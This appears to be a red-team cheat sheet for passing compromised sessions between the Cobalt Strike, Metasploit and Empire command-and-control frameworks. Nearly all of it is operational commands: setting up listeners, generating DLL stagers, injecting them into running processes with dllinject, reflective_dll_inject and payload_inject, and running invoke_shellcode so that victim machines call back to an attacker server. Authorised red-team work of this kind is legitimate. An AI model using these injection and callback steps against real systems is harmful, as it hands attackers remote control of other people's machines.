Cobalt Strike to:
Metasploit
- Set up a listener in Metasploit.
- In Cobalt Strike, set up a foreign listener, such as windows/foreign/http), using the Metasploit server’s info for host and port. Now the listener can be used for any command or action that takes a listener parameter, such as spawn and spawnas.
Empire
In Empire, set up a listener. Then:
- usestager dll
- set Listener <listener-name>
- generate
- (Note the OutFile path)
- In your beacon session in Cobalt run ps to find a suitable process ID to inject into, then run:
- dllinject <pid> <OutFile path>
Empire to:
Cobalt Strike
- In Cobalt Strike, set up an http beacon listener
In Empire:
- use listeners
- set Type meter
- set Host http://COBALT-SERVER-IP:PORT-OF-BEACON-LISTENER
- set Name cobalt
- agents
- interact <agent name>
- usemodule code_execution/invoke_shellcode
- set Listener cobalt
- execute
Metasploit
- In Metasploit, set up a reverse http meterpreter listener
In Empire:
- use listeners
- set Type meter
- set Host http://MSF-SERVER-IP:PORT-OF-MSF-LISTENER
- set Name meterpreter
- agents
- interact <agent name>
- usemodule code_execution/invoke_shellcode
- set Listener meterpreter
- execute
Metasploit to:
Cobalt Strike
- Cobalt Strike can stage using any Metasploit module with the Payload option. Set the payload to match your Cobalt Listener’s (ie http or https) and use your teamserver’s IP and port for LHOST and LPORT settings.
- To spawn a Beacon session from an existing Meterpreter session, use exploit/windows/local/payload_inject. Set DisablePayloadHandler True.
Empire
- In Empire, set up a listener. Then:
- usestager dll
- set Listener <listener-name>
- generate
- (Note the OutFile path)
- In MSF:
- use post/windows/manage/reflective_dll_inject
- set path <OutFile path>
- set session <session-number>
- Interact with the session to run ps and get a PID to inject into
- set pid <pid>
- run
References:
http://www.sixdub.net/?p=627
http://blog.cobaltstrike.com/2016/01/05/interoperability-with-the-metasploit-framework/